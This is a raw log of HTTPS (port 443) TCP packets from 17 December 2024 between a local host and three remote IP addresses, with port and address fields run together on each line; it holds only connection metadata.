                                                                        Dec 17, 2024 08:38:22.064852953 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.068981886 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.069150925 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.073175907 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.073518038 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.075232029 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.075336933 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.078528881 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.078794956 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.143193960 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.143376112 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.146055937 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.146110058 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.150867939 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.150922060 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.154110909 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.154165030 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.208209991 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.208287954 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.208333969 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.208381891 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.213515043 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.213526964 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.213562012 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.213627100 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.213627100 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.213639975 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.213751078 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.221213102 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.221240044 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.221354961 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.221354961 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.221365929 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.223323107 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.229995012 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.230011940 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.230067015 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.230073929 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.230139971 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.238706112 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.238745928 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.238794088 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.238810062 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.239733934 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.246890068 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.246908903 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.246979952 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.246979952 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.246989012 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.247596979 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.255712032 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.255733013 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.255785942 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.255793095 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.255827904 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.256170034 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.336443901 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.336503029 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.336513042 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.336522102 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.336561918 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.336620092 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.338898897 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.339098930 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.345172882 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.345215082 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.345247030 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.345248938 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.345263004 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.345303059 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.345305920 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:22.345350027 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.345350027 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.345567942 CET49711443192.168.2.12104.21.48.1
                                                                        Dec 17, 2024 08:38:22.345585108 CET44349711104.21.48.1192.168.2.12
                                                                        Dec 17, 2024 08:38:23.815498114 CET49714443192.168.2.12188.245.211.225
                                                                        Dec 17, 2024 08:38:23.815538883 CET44349714188.245.211.225192.168.2.12
                                                                        Dec 17, 2024 08:38:23.815597057 CET49714443192.168.2.12188.245.211.225
                                                                        Dec 17, 2024 08:38:23.831345081 CET49714443192.168.2.12188.245.211.225
                                                                        Dec 17, 2024 08:38:23.831357956 CET44349714188.245.211.225192.168.2.12
                                                                        Dec 17, 2024 08:38:25.250730991 CET44349714188.245.211.225192.168.2.12
                                                                        Dec 17, 2024 08:38:25.250868082 CET49714443192.168.2.12188.245.211.225
                                                                        Dec 17, 2024 08:38:25.252594948 CET49714443192.168.2.12188.245.211.225
                                                                        Dec 17, 2024 08:38:25.252612114 CET44349714188.245.211.225192.168.2.12
                                                                        Dec 17, 2024 08:38:25.252948046 CET44349714188.245.211.225192.168.2.12
                                                                        Dec 17, 2024 08:38:25.259438038 CET49714443192.168.2.12188.245.211.225
                                                                        Dec 17, 2024 08:38:25.303359985 CET44349714188.245.211.225192.168.2.12
                                                                        Dec 17, 2024 08:38:25.778399944 CET44349714188.245.211.225192.168.2.12
                                                                        Dec 17, 2024 08:38:25.778430939 CET44349714188.245.211.225192.168.2.12
                                                                        Dec 17, 2024 08:38:25.778510094 CET49714443192.168.2.12188.245.211.225
                                                                        Dec 17, 2024 08:38:25.778527975 CET44349714188.245.211.225192.168.2.12
                                                                        Dec 17, 2024 08:38:25.780045986 CET44349714188.245.211.225192.168.2.12
                                                                        Dec 17, 2024 08:38:25.783142090 CET49714443192.168.2.12188.245.211.225
                                                                        Dec 17, 2024 08:38:25.783149958 CET44349714188.245.211.225192.168.2.12
                                                                        Dec 17, 2024 08:38:25.783171892 CET49714443192.168.2.12188.245.211.225
                                                                        Dec 17, 2024 08:38:25.783202887 CET49714443192.168.2.12188.245.211.225
                                                                        Dec 17, 2024 08:38:26.209927082 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:26.209973097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:26.210376024 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:26.210376024 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:26.210408926 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:27.428483009 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:27.428548098 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:27.431199074 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:27.431205988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:27.431497097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:27.433317900 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:27.479331017 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.064889908 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.064961910 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.065000057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.065011024 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.065053940 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.065058947 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.065064907 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.065102100 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.073225975 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.081603050 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.081661940 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.081685066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.089951992 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.090009928 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.090019941 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.135231972 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.184412003 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.232357025 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.257184982 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.262681007 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.266577005 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.266591072 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.271152973 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.271337032 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.271353006 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.279541969 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.281625986 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.281646013 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.287933111 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.288564920 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.288580894 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.304625034 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.304663897 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.304838896 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.304863930 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.304979086 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.312938929 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.321361065 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.321427107 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.321791887 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.321806908 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.322155952 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.328366041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.335750103 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.336061954 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.336076021 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.342432022 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.346420050 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.346431017 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.390396118 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.390408039 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.439737082 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.449089050 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.451484919 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.451690912 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.451709986 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.458108902 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.458376884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.458561897 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.458574057 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.461553097 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.462958097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.472568035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.473066092 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.473076105 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.473179102 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.477097988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.477107048 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.477389097 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.481576920 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.482148886 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.490499020 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.490509033 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.490570068 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.499264002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.499272108 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.499414921 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.508210897 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.508218050 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.508517027 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.512873888 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.512986898 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.521673918 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.523328066 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.530749083 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.531606913 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.539367914 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.543340921 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.641658068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.642019987 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.646837950 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.650198936 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.650252104 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.650269985 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.650393009 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.658617973 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.659037113 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.659066916 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.659293890 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.663626909 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.663810015 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.669862032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.670114040 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.672951937 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.673109055 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.679044008 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.682620049 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.683605909 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.685647964 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.688826084 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.689047098 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.694809914 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.694963932 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.697720051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.697925091 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.704478025 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.704889059 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.710299015 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.710504055 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.716370106 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.717195034 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.719441891 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.719639063 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.725941896 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.726223946 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.728615999 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.729335070 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.736016035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.736574888 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.741240978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.741758108 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.833508968 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.833810091 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.837354898 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.837610006 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.842130899 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.842369080 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.846947908 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.847661972 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.849345922 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.849647045 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.854022026 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.854223013 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.856301069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.856775045 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.860764027 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.861336946 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.865612030 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.866252899 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.869482040 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.869555950 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.877890110 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.877898932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.877985001 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.877999067 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.878070116 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.878077030 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.878149033 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.892508984 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.892529964 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.892736912 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.892736912 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.892755032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.906203985 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.906219006 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.906572104 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.906584978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.920753956 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.920778036 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.920964956 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.920964956 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.920975924 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.935385942 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.935404062 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:28.935596943 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:28.935612917 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.028179884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.028207064 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.028337955 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.028337955 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.028354883 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.039475918 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.039490938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.039506912 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.039515972 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.039654970 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.039669037 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.039918900 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.050033092 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.050107956 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.050115108 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.050259113 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.050286055 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.050286055 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.050293922 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.050580978 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.058610916 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.058633089 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.058664083 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.058820009 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.058820009 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.058828115 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.068198919 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.068218946 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.068458080 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.068466902 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.077147007 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.077172041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.077287912 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.077287912 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.077296019 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.086467981 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.086489916 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.086662054 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.086662054 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.086699963 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.095963001 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.095985889 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.096098900 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.096112967 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.096127033 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.158792019 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.219511032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.219528913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.219562054 CET44349716188.114.96.6192.168.2.12
